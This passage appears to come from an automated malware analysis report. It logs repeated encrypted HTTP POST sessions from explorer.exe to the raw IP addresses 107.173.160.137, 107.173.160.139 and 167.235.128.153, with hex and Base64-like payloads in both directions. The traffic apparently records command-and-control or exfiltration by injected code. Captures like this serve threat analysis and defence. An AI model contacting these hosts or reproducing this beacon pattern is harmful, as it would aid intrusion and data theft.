                                                                              2024-07-27 12:54:51 UTC1122OUTData Raw: 4a 36 4c 30 55 65 6a 53 35 47 34 44 78 4d 4c 5a 68 48 6b 6b 56 49 73 46 32 4e 4e 66 4c 4d 62 51 52 2f 73 62 39 53 46 68 47 4f 6c 66 6f 57 35 55 6d 6b 69 54 71 72 65 37 71 65 56 2b 35 70 31 56 43 58 4b 52 4c 77 51 77 61 34 32 4e 45 62 53 47 74 4b 51 4d 53 53 2b 50 77 69 50 58 42 35 4b 4b 50 74 55 4b 6d 39 58 53 7a 69 6b 41 32 4d 75 70 66 34 75 6c 43 68 47 75 73 2f 45 78 67 6d 6b 73 4d 78 63 6a 57 31 78 57 61 65 43 56 6c 30 6d 31 41 4c 43 6a 6d 4f 4f 2f 7a 6f 4e 34 59 6e 41 63 55 45 30 49 67 32 51 4a 36 66 68 71 31 6e 7a 55 74 41 74 43 31 4c 4b 43 4a 4a 6a 66 39 62 51 44 30 6d 6b 76 6a 79 48 45 70 6d 2f 71 6d 6d 34 33 6c 78 54 70 6e 41 63 58 4c 66 77 57 38 6f 58 73 39 42 71 4a 34 59 31 34 74 54 74 42 51 57 73 43 43 49 4f 37 6c 47 56 34 39 2f 61 79 57 6d 71
                                                                              Data Ascii: J6L0UejS5G4DxMLZhHkkVIsF2NNfLMbQR/sb9SFhGOlfoW5UmkiTqre7qeV+5p1VCXKRLwQwa42NEbSGtKQMSS+PwiPXB5KKPtUKm9XSzikA2Mupf4ulChGus/ExgmksMxcjW1xWaeCVl0m1ALCjmOO/zoN4YnAcUE0Ig2QJ6fhq1nzUtAtC1LKCJJjf9bQD0mkvjyHEpm/qmm43lxTpnAcXLfwW8oXs9BqJ4Y14tTtBQWsCCIO7lGV49/ayWmq
                                                                              2024-07-27 12:54:52 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:52 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:52 UTC685INData Raw: 4a 49 2b 67 61 65 2b 36 48 4d 71 32 72 4f 54 68 64 70 69 62 4f 49 75 51 48 61 62 75 2b 69 31 6e 73 41 42 57 76 33 4b 31 50 43 6b 69 65 72 54 37 37 49 79 72 74 45 65 2f 7a 72 41 71 62 52 41 73 49 61 48 6f 36 70 67 35 6e 30 45 78 7a 6a 2f 6a 45 78 44 66 74 78 42 2f 61 32 4d 4c 51 66 61 64 2b 67 34 70 77 35 52 66 33 77 59 4e 68 5a 31 73 55 62 4e 69 49 66 76 67 73 71 73 69 64 65 68 71 46 4d 4a 71 70 4b 71 35 7a 79 39 45 69 64 31 5a 74 54 38 6d 54 74 41 36 54 65 42 53 64 61 63 76 62 32 46 63 37 64 68 31 68 37 4c 2f 78 71 39 63 66 71 47 31 61 6b 65 66 79 6c 4b 42 43 65 79 4d 4a 7a 79 32 45 62 6c 73 72 6d 6e 72 59 43 43 78 44 33 52 44 31 62 36 4a 65 73 76 47 30 51 59 72 58 79 76 50 31 59 4e 74 30 69 70 57 57 61 54 43 4e 30 4c 47 33 75 6c 71 4d 45 46 30 66 62 56
                                                                              Data Ascii: JI+gae+6HMq2rOThdpibOIuQHabu+i1nsABWv3K1PCkierT77IyrtEe/zrAqbRAsIaHo6pg5n0Exzj/jExDftxB/a2MLQfad+g4pw5Rf3wYNhZ1sUbNiIfvgsqsidehqFMJqpKq5zy9Eid1ZtT8mTtA6TeBSdacvb2Fc7dh1h7L/xq9cfqG1akefylKBCeyMJzy2EblsrmnrYCCxD3RD1b6JesvG0QYrXyvP1YNt0ipWWaTCN0LG3ulqMEF0fbV


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              62192.168.2.449833107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:53 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:53 UTC1122OUTData Raw: 42 42 66 42 6a 51 73 69 5a 77 4c 48 47 6a 62 6e 76 63 71 38 58 4e 56 44 34 75 2b 77 4a 4b 67 54 51 67 74 58 4d 79 34 68 57 36 6d 59 34 55 67 5a 64 51 74 4a 61 64 6f 78 61 4d 4b 4a 66 4b 69 64 42 72 55 68 73 76 46 50 6c 75 63 4d 31 48 4e 78 4c 2b 78 35 57 59 38 30 35 68 63 38 42 33 47 4a 41 2b 37 6f 61 38 6f 75 72 33 45 37 50 53 62 6d 56 6f 6f 43 43 74 68 4d 57 62 64 75 39 30 50 34 36 6a 6d 78 6f 46 6a 4f 68 6b 31 7a 6e 59 73 6d 79 44 64 39 45 74 69 4f 72 35 4e 35 77 74 43 70 76 42 48 6b 45 52 62 6d 41 58 2f 4a 51 43 54 52 34 6f 2b 42 57 48 4f 38 31 64 61 77 38 42 49 70 4f 31 56 55 7a 35 63 71 4f 55 4d 37 48 50 7a 4b 48 32 73 70 32 68 69 75 4d 6b 77 7a 34 46 66 47 53 55 61 66 54 58 54 5a 56 7a 61 47 4c 6b 72 52 55 54 49 59 49 7a 52 7a 51 79 48 69 69 51 58
                                                                              Data Ascii: BBfBjQsiZwLHGjbnvcq8XNVD4u+wJKgTQgtXMy4hW6mY4UgZdQtJadoxaMKJfKidBrUhsvFPlucM1HNxL+x5WY805hc8B3GJA+7oa8our3E7PSbmVooCCthMWbdu90P46jmxoFjOhk1znYsmyDd9EtiOr5N5wtCpvBHkERbmAX/JQCTR4o+BWHO81daw8BIpO1VUz5cqOUM7HPzKH2sp2hiuMkwz4FfGSUafTXTZVzaGLkrRUTIYIzRzQyHiiQX
                                                                              2024-07-27 12:54:54 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:54 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:54 UTC685INData Raw: 72 34 35 42 57 48 4f 68 37 46 68 63 6e 4b 65 2b 6c 6d 61 57 55 42 4f 75 2b 47 6b 35 6a 77 5a 73 72 76 51 55 6e 39 57 4b 38 7a 67 64 47 2f 58 49 67 51 2b 78 43 5a 61 4d 41 45 68 6a 79 69 76 2f 55 49 59 44 6b 73 61 6c 69 68 68 52 38 34 63 32 42 4c 4a 73 7a 33 77 6d 72 74 53 49 56 35 41 4d 56 38 2f 54 32 71 59 62 62 50 44 2f 53 70 4d 79 4d 45 59 51 6f 55 4a 38 70 32 73 5a 52 36 57 47 41 5a 49 34 44 73 4e 64 36 31 36 46 46 4a 64 45 38 34 70 72 47 31 72 32 4d 58 6e 39 4f 43 68 58 57 59 49 78 37 36 2f 58 5a 62 4b 6c 44 49 50 41 42 7a 46 72 2f 4f 50 5a 30 77 75 33 62 76 6b 78 67 30 54 48 56 41 67 4b 4e 52 34 58 73 74 38 33 53 32 4b 49 6b 30 34 64 31 75 4f 67 6b 48 69 66 48 36 2b 30 50 79 66 31 6f 33 64 35 4e 6e 79 57 43 45 48 31 61 30 33 6b 54 42 2f 78 47 68 50
                                                                              Data Ascii: r45BWHOh7FhcnKe+lmaWUBOu+Gk5jwZsrvQUn9WK8zgdG/XIgQ+xCZaMAEhjyiv/UIYDksalihhR84c2BLJsz3wmrtSIV5AMV8/T2qYbbPD/SpMyMEYQoUJ8p2sZR6WGAZI4DsNd616FFJdE84prG1r2MXn9OChXWYIx76/XZbKlDIPABzFr/OPZ0wu3bvkxg0THVAgKNR4Xst83S2KIk04d1uOgkHifH6+0Pyf1o3d5NnyWCEH1a03kTB/xGhP


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              63192.168.2.449835107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:55 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:55 UTC1122OUTData Raw: 44 79 61 65 37 4b 4f 76 39 76 31 30 57 79 42 4a 2b 33 61 73 36 4b 68 39 70 59 76 35 44 39 57 37 6c 76 68 6a 4d 58 77 6b 41 5a 4e 41 4b 53 53 48 62 38 33 57 76 6d 47 41 43 2b 78 46 53 34 31 65 30 6f 57 6c 34 68 51 66 4b 62 69 35 33 5a 32 49 58 53 76 37 6f 51 67 36 4a 56 49 69 62 56 68 33 4d 38 6e 76 6f 62 69 32 64 65 34 4d 6f 58 75 58 41 4f 70 30 32 41 55 46 64 7a 6a 33 55 48 6a 4f 5a 76 37 70 32 6c 69 61 65 4c 4e 43 6d 50 41 67 34 4a 34 41 34 31 37 6a 49 43 57 76 37 68 75 59 33 70 52 67 30 61 71 33 55 74 4e 74 39 4f 61 79 64 47 34 43 64 59 6d 58 46 37 6a 37 77 41 76 64 67 4e 72 32 62 45 33 52 2b 78 76 36 72 32 79 33 64 42 66 2b 76 54 59 31 5a 47 34 63 45 77 76 76 6a 59 52 2f 32 53 2b 64 50 54 4f 4a 66 4e 72 43 4a 4f 34 58 59 4c 75 6b 6b 51 48 61 39 43 42
                                                                              Data Ascii: Dyae7KOv9v10WyBJ+3as6Kh9pYv5D9W7lvhjMXwkAZNAKSSHb83WvmGAC+xFS41e0oWl4hQfKbi53Z2IXSv7oQg6JVIibVh3M8nvobi2de4MoXuXAOp02AUFdzj3UHjOZv7p2liaeLNCmPAg4J4A417jICWv7huY3pRg0aq3UtNt9OaydG4CdYmXF7j7wAvdgNr2bE3R+xv6r2y3dBf+vTY1ZG4cEwvvjYR/2S+dPTOJfNrCJO4XYLukkQHa9CB
                                                                              2024-07-27 12:54:56 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:56 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:56 UTC685INData Raw: 59 48 41 65 31 4a 59 30 75 7a 32 48 6b 59 43 44 6c 6d 43 59 61 30 39 72 79 4b 2b 2b 61 2f 6f 6b 6b 4e 4d 56 4d 44 75 71 63 78 2f 32 7a 4c 50 76 51 51 58 44 32 2f 6e 71 69 64 41 30 39 36 34 50 5a 63 54 4e 6f 4b 36 58 4a 43 7a 33 68 50 46 57 54 63 51 61 36 39 74 54 7a 6c 65 6e 53 59 64 76 48 34 74 2f 38 39 32 45 47 49 6a 50 43 72 47 6d 68 50 45 73 37 61 51 56 36 55 36 56 79 5a 42 55 6e 52 46 65 64 2f 71 6e 46 46 65 45 66 6c 4c 5a 6b 50 79 62 6e 34 31 53 79 31 6a 43 32 61 6b 77 75 62 52 39 55 32 52 6d 61 32 31 30 72 62 64 34 4d 46 30 34 65 4c 44 46 62 39 4e 37 71 76 54 35 33 42 65 65 7a 79 63 49 45 59 42 43 2f 47 33 38 78 79 50 63 7a 6d 67 64 59 2b 62 42 6d 69 62 75 70 2b 75 33 4e 35 52 63 6d 6e 64 58 55 43 63 39 65 48 69 58 76 53 31 31 6d 30 6f 45 49 55 54
                                                                              Data Ascii: YHAe1JY0uz2HkYCDlmCYa09ryK++a/okkNMVMDuqcx/2zLPvQQXD2/nqidA0964PZcTNoK6XJCz3hPFWTcQa69tTzlenSYdvH4t/892EGIjPCrGmhPEs7aQV6U6VyZBUnRFed/qnFFeEflLZkPybn41Sy1jC2akwubR9U2Rma210rbd4MF04eLDFb9N7qvT53BeezycIEYBC/G38xyPczmgdY+bBmibup+u3N5RcmndXUCc9eHiXvS11m0oEIUT


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              64192.168.2.449836167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:57 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:54:57 UTC1267OUTData Raw: 43 35 2f 66 71 67 63 46 62 74 41 2f 69 44 41 6e 68 43 49 35 35 4b 61 50 54 6a 46 2b 52 46 39 70 33 64 43 61 2f 38 4e 6c 4e 46 33 42 6b 73 78 5a 4a 73 73 66 44 5a 32 36 48 46 32 6b 6b 34 51 67 6d 34 2f 59 43 30 56 69 73 32 41 76 4d 4b 75 78 66 79 70 72 52 64 58 75 7a 57 56 44 47 46 44 54 4a 62 51 63 6f 4b 36 58 38 58 2b 66 33 7a 6d 34 4f 47 47 6e 47 6b 47 4c 2b 41 47 6d 37 4e 7a 33 6c 50 6d 4c 6a 59 4b 51 52 5a 7a 6f 50 57 6b 32 4e 76 74 68 6c 51 49 43 30 6d 32 55 45 45 6a 72 77 5a 44 2b 33 50 44 6f 44 75 67 55 37 4d 64 44 30 72 63 78 5a 71 4c 37 33 53 35 4d 6a 63 50 61 65 73 58 77 6f 7a 58 73 37 76 6c 56 69 69 46 46 70 6d 39 45 67 6c 4f 55 30 67 44 75 71 39 75 49 4e 72 6c 32 35 42 44 68 69 4d 2b 5a 69 4a 69 67 4c 49 57 79 69 6f 30 6f 31 4a 34 6f 6b 7a 34
                                                                              Data Ascii: C5/fqgcFbtA/iDAnhCI55KaPTjF+RF9p3dCa/8NlNF3BksxZJssfDZ26HF2kk4Qgm4/YC0Vis2AvMKuxfyprRdXuzWVDGFDTJbQcoK6X8X+f3zm4OGGnGkGL+AGm7Nz3lPmLjYKQRZzoPWk2NvthlQIC0m2UEEjrwZD+3PDoDugU7MdD0rcxZqL73S5MjcPaesXwozXs7vlViiFFpm9EglOU0gDuq9uINrl25BDhiM+ZiJigLIWyio0o1J4okz4
                                                                              2024-07-27 12:54:58 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:58 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:58 UTC685INData Raw: 45 30 4e 66 56 49 4a 6d 59 73 5a 42 7a 79 77 2f 5a 5a 66 66 51 65 32 54 45 68 54 65 44 73 49 46 50 38 5a 32 47 41 56 34 2b 39 55 45 46 37 48 74 75 67 64 6b 6d 4b 31 31 62 49 35 4e 33 64 79 4e 58 6f 4c 6e 53 41 6f 31 33 58 35 61 4b 74 42 61 4a 70 45 49 37 37 76 54 38 77 34 64 30 74 71 72 4f 57 65 78 2b 68 68 65 30 2f 4d 66 65 58 37 54 43 35 61 54 46 43 75 31 44 57 38 36 35 6a 42 4a 71 61 6d 30 37 42 79 55 73 75 78 6c 57 69 4b 66 31 2f 58 38 59 2b 78 6f 34 59 53 62 74 42 77 67 4c 44 4c 6e 66 5a 43 46 6c 73 51 42 70 42 53 76 70 64 36 72 34 36 4a 58 79 41 76 44 43 34 49 69 4c 33 51 42 6d 48 56 4c 34 47 76 36 49 6c 39 39 32 34 46 73 37 51 6a 67 4b 6b 32 77 47 50 79 79 6a 37 6c 59 68 49 69 64 59 50 43 49 34 5a 61 51 37 76 38 6c 6f 6f 49 57 6b 59 32 6e 46 30 68
                                                                              Data Ascii: E0NfVIJmYsZBzyw/ZZffQe2TEhTeDsIFP8Z2GAV4+9UEF7HtugdkmK11bI5N3dyNXoLnSAo13X5aKtBaJpEI77vT8w4d0tqrOWex+hhe0/MfeX7TC5aTFCu1DW865jBJqam07ByUsuxlWiKf1/X8Y+xo4YSbtBwgLDLnfZCFlsQBpBSvpd6r46JXyAvDC4IiL3QBmHVL4Gv6Il9924Fs7QjgKk2wGPyyj7lYhIidYPCI4ZaQ7v8looIWkY2nF0h


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              65192.168.2.449837107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:59 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:59 UTC1122OUTData Raw: 64 6a 70 53 50 56 46 65 58 5a 6e 4a 71 79 4d 41 74 6c 6b 33 2b 34 43 64 2f 64 51 43 6d 39 76 6a 78 6a 75 4f 67 54 4a 51 6c 68 5a 66 46 72 41 63 31 37 74 62 68 78 35 70 48 76 41 73 51 43 78 46 68 47 2f 32 42 65 66 74 78 7a 55 6f 30 33 37 72 6c 66 2f 68 55 4f 4e 36 4b 30 6a 6a 61 4e 54 6f 50 48 67 6b 75 75 54 4d 37 6d 39 72 55 75 63 48 45 79 49 58 77 79 58 79 79 74 66 4a 45 72 2b 39 64 37 48 4e 65 47 41 6c 46 77 77 5a 52 63 44 70 55 6e 53 65 38 71 56 4e 72 6c 55 67 54 71 50 6c 70 76 71 41 78 69 4b 42 63 5a 63 4b 61 45 61 4e 4b 63 30 44 65 68 41 43 44 55 65 73 31 71 43 6c 46 6d 4a 64 5a 41 34 69 57 61 58 73 66 6a 48 65 4e 6d 79 6d 6b 55 6e 61 74 45 6f 6e 57 4c 45 6e 48 77 7a 6f 38 6a 39 4c 2f 35 66 73 73 52 6e 53 31 63 42 34 43 35 43 72 56 30 6f 4f 68 68 2b
                                                                              Data Ascii: djpSPVFeXZnJqyMAtlk3+4Cd/dQCm9vjxjuOgTJQlhZfFrAc17tbhx5pHvAsQCxFhG/2BeftxzUo037rlf/hUON6K0jjaNToPHgkuuTM7m9rUucHEyIXwyXyytfJEr+9d7HNeGAlFwwZRcDpUnSe8qVNrlUgTqPlpvqAxiKBcZcKaEaNKc0DehACDUes1qClFmJdZA4iWaXsfjHeNmymkUnatEonWLEnHwzo8j9L/5fssRnS1cB4C5CrV0oOhh+
                                                                              2024-07-27 12:55:00 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:00 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:00 UTC685INData Raw: 59 38 50 74 44 77 44 73 77 6c 43 53 6b 51 54 36 6e 38 77 2f 34 38 77 67 41 4a 47 36 65 57 62 35 38 34 4f 53 58 36 62 77 49 35 57 79 56 50 46 2b 4d 77 6a 4a 49 6b 6d 30 6a 34 6a 66 75 5a 34 6d 63 35 73 35 74 4b 54 71 72 70 67 67 7a 79 32 41 38 66 70 51 48 36 46 4a 51 59 51 72 73 64 73 42 76 68 68 61 4c 35 4e 30 49 43 2b 6b 79 49 64 67 34 79 36 56 45 58 79 46 4e 4c 46 66 52 31 63 38 35 37 30 2f 4a 37 77 2b 31 34 73 51 54 47 45 6e 36 76 63 70 49 7a 70 41 2b 64 62 67 2b 68 6e 55 70 4b 75 52 5a 73 42 58 68 44 59 4e 46 68 37 61 70 6c 45 67 4c 51 41 6a 2f 33 33 43 79 76 71 4f 77 2f 61 58 35 57 4b 76 46 56 49 6c 38 51 4a 36 69 52 79 67 72 31 46 54 6f 56 58 73 68 30 63 65 49 58 2b 78 31 75 36 5a 33 33 2b 67 65 45 65 79 63 36 69 71 48 5a 6a 2b 34 41 74 7a 68 6e 79
                                                                              Data Ascii: Y8PtDwDswlCSkQT6n8w/48wgAJG6eWb584OSX6bwI5WyVPF+MwjJIkm0j4jfuZ4mc5s5tKTqrpggzy2A8fpQH6FJQYQrsdsBvhhaL5N0IC+kyIdg4y6VEXyFNLFfR1c8570/J7w+14sQTGEn6vcpIzpA+dbg+hnUpKuRZsBXhDYNFh7aplEgLQAj/33CyvqOw/aX5WKvFVIl8QJ6iRygr1FToVXsh0ceIX+x1u6Z33+geEeyc6iqHZj+4Atzhny


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              66192.168.2.449838107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:01 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:01 UTC1122OUTData Raw: 49 59 5a 56 2b 47 54 37 70 50 38 77 44 54 6e 36 64 74 73 41 44 4f 39 76 2b 62 7a 5a 55 4c 6e 67 6d 44 48 6e 4d 57 4d 75 4a 41 63 31 74 65 42 4b 31 49 48 6b 4c 76 35 51 56 32 63 73 61 78 53 72 44 5a 42 78 75 6b 70 77 31 51 2f 6b 38 33 64 42 73 75 72 4f 72 6a 2f 2b 36 59 68 4e 61 57 6f 64 47 46 4c 44 6f 50 52 4b 6b 36 6e 75 70 4c 74 46 32 4d 57 77 4a 66 2b 4d 77 33 6a 4d 43 66 4b 55 6b 72 55 38 5a 37 49 59 68 49 2b 33 4e 4d 39 63 4d 31 67 54 5a 4e 52 2f 6e 71 49 54 4b 32 6c 34 53 31 2f 5a 32 6a 41 4b 76 7a 7a 51 58 30 4b 43 46 53 53 7a 64 67 52 2f 4d 38 77 57 2b 66 65 46 2f 4b 50 54 5a 79 51 65 6b 30 31 34 67 78 38 77 45 51 50 32 38 5a 69 74 7a 2f 64 34 74 57 6d 34 62 66 73 50 4a 62 63 42 6b 7a 4a 68 76 6a 36 6f 38 52 67 79 42 65 42 75 35 32 4b 2b 2b 30 62
                                                                              Data Ascii: IYZV+GT7pP8wDTn6dtsADO9v+bzZULngmDHnMWMuJAc1teBK1IHkLv5QV2csaxSrDZBxukpw1Q/k83dBsurOrj/+6YhNaWodGFLDoPRKk6nupLtF2MWwJf+Mw3jMCfKUkrU8Z7IYhI+3NM9cM1gTZNR/nqITK2l4S1/Z2jAKvzzQX0KCFSSzdgR/M8wW+feF/KPTZyQek014gx8wEQP28Zitz/d4tWm4bfsPJbcBkzJhvj6o8RgyBeBu52K++0b
                                                                              2024-07-27 12:55:02 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:02 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:02 UTC685INData Raw: 52 65 39 4c 51 62 4e 67 62 36 52 70 45 6f 4d 34 4e 58 53 37 42 79 2b 68 7a 65 75 69 56 6f 78 2b 48 4d 41 4f 38 34 78 75 68 49 34 31 74 62 70 35 65 6b 33 30 4a 38 73 44 66 4d 76 2b 55 73 76 5a 70 77 30 68 6f 4a 4e 62 4a 63 33 47 72 33 36 39 48 4e 66 38 5a 42 34 59 51 75 6f 34 45 36 36 6e 7a 6f 76 50 62 2b 75 4a 57 4e 42 35 4c 66 43 36 35 62 65 68 72 52 5a 33 74 4d 34 2b 76 34 59 69 79 69 53 72 36 73 62 39 6f 62 62 71 5a 36 33 6c 43 56 5a 4c 6e 31 6d 30 6c 65 68 4f 6b 61 57 45 43 57 32 4b 4f 39 6d 6a 38 79 64 30 6d 67 43 46 51 51 52 74 71 72 4d 38 6f 55 6c 41 77 4f 76 73 47 35 5a 77 48 7a 48 48 70 4c 63 30 45 4e 50 4f 62 66 77 35 42 79 6f 4a 38 49 79 34 38 50 68 71 78 49 61 34 54 6d 52 36 49 55 74 43 63 57 63 71 5a 72 4c 6f 44 53 64 55 6e 35 70 67 79 51 30
                                                                              Data Ascii: Re9LQbNgb6RpEoM4NXS7By+hzeuiVox+HMAO84xuhI41tbp5ek30J8sDfMv+UsvZpw0hoJNbJc3Gr369HNf8ZB4YQuo4E66nzovPb+uJWNB5LfC65behrRZ3tM4+v4YiyiSr6sb9obbqZ63lCVZLn1m0lehOkaWECW2KO9mj8yd0mgCFQQRtqrM8oUlAwOvsG5ZwHzHHpLc0ENPObfw5ByoJ8Iy48PhqxIa4TmR6IUtCcWcqZrLoDSdUn5pgyQ0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              67192.168.2.449840167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:03 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:55:03 UTC1267OUTData Raw: 4e 55 32 37 49 54 72 62 7a 7a 33 35 41 46 72 45 43 33 73 74 54 75 4e 54 2f 33 4c 32 4b 47 35 77 67 67 55 44 31 70 43 50 34 42 70 47 68 4d 47 75 48 79 57 65 36 61 36 39 53 46 4a 55 32 33 31 37 32 48 36 49 38 6d 67 6d 4e 6d 66 45 68 6f 69 4b 42 33 4f 6e 51 53 51 63 35 47 66 73 38 4a 4b 69 63 45 6e 69 76 51 4b 50 33 36 2b 32 69 76 41 59 76 37 31 52 79 6b 59 31 4f 56 6d 38 62 77 4f 69 2b 71 42 7a 44 71 49 69 7a 4b 46 7a 54 36 69 4c 4b 73 44 57 31 53 37 42 6b 39 58 63 78 32 35 38 33 6c 49 5a 52 77 54 77 6a 56 77 6b 35 6e 32 2b 52 2b 75 32 69 77 69 68 6b 41 68 44 57 6f 51 75 4d 53 64 72 45 73 2f 53 72 4f 4a 52 53 6c 41 43 35 4a 67 50 54 72 67 32 42 33 33 6c 73 4e 6c 6d 71 58 56 37 6c 33 50 4d 4b 57 65 51 2f 32 63 30 6f 45 49 30 6d 77 6a 45 50 50 72 67 50 39 38
                                                                              Data Ascii: NU27ITrbzz35AFrEC3stTuNT/3L2KG5wggUD1pCP4BpGhMGuHyWe6a69SFJU23172H6I8mgmNmfEhoiKB3OnQSQc5Gfs8JKicEnivQKP36+2ivAYv71RykY1OVm8bwOi+qBzDqIizKFzT6iLKsDW1S7Bk9Xcx2583lIZRwTwjVwk5n2+R+u2iwihkAhDWoQuMSdrEs/SrOJRSlAC5JgPTrg2B33lsNlmqXV7l3PMKWeQ/2c0oEI0mwjEPPrgP98
                                                                              2024-07-27 12:55:04 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:04 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:04 UTC685INData Raw: 4d 71 4a 67 5a 52 48 33 79 49 4e 42 48 49 6e 50 76 66 6e 62 63 68 6c 49 62 4c 4f 35 4a 4f 79 4c 56 43 45 6f 69 71 65 33 35 68 73 61 73 4e 45 39 44 78 50 5a 31 6f 75 30 2b 69 39 62 72 6b 6e 44 48 55 35 4f 34 35 2b 67 4a 38 70 44 49 50 39 70 6e 63 65 50 70 65 61 4a 56 32 45 79 4d 36 58 4b 59 6a 75 69 4f 44 32 69 31 41 47 36 73 71 30 77 6e 73 41 4c 4f 59 37 74 45 4b 4f 68 57 37 7a 75 2b 50 74 35 55 58 71 44 61 30 72 64 67 4a 52 54 48 69 46 4c 52 52 32 62 67 52 44 39 5a 52 6f 5a 43 45 51 73 47 6e 69 6c 4b 36 38 67 74 63 2b 47 72 66 78 33 68 42 66 66 37 32 48 70 67 45 4a 5a 5a 66 51 48 6f 4a 30 37 44 4b 56 69 50 73 31 2b 43 74 4a 66 66 6c 59 63 52 54 65 78 6a 77 46 4d 49 35 2b 70 72 37 59 76 32 44 37 56 69 6b 4b 79 45 71 6b 6f 43 70 72 79 76 74 4e 7a 61 64 4a
                                                                              Data Ascii: MqJgZRH3yINBHInPvfnbchlIbLO5JOyLVCEoiqe35hsasNE9DxPZ1ou0+i9brknDHU5O45+gJ8pDIP9pncePpeaJV2EyM6XKYjuiOD2i1AG6sq0wnsALOY7tEKOhW7zu+Pt5UXqDa0rdgJRTHiFLRR2bgRD9ZRoZCEQsGnilK68gtc+Grfx3hBff72HpgEJZZfQHoJ07DKViPs1+CtJfflYcRTexjwFMI5+pr7Yv2D7VikKyEqkoCpryvtNzadJ


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              68192.168.2.449841107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:05 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
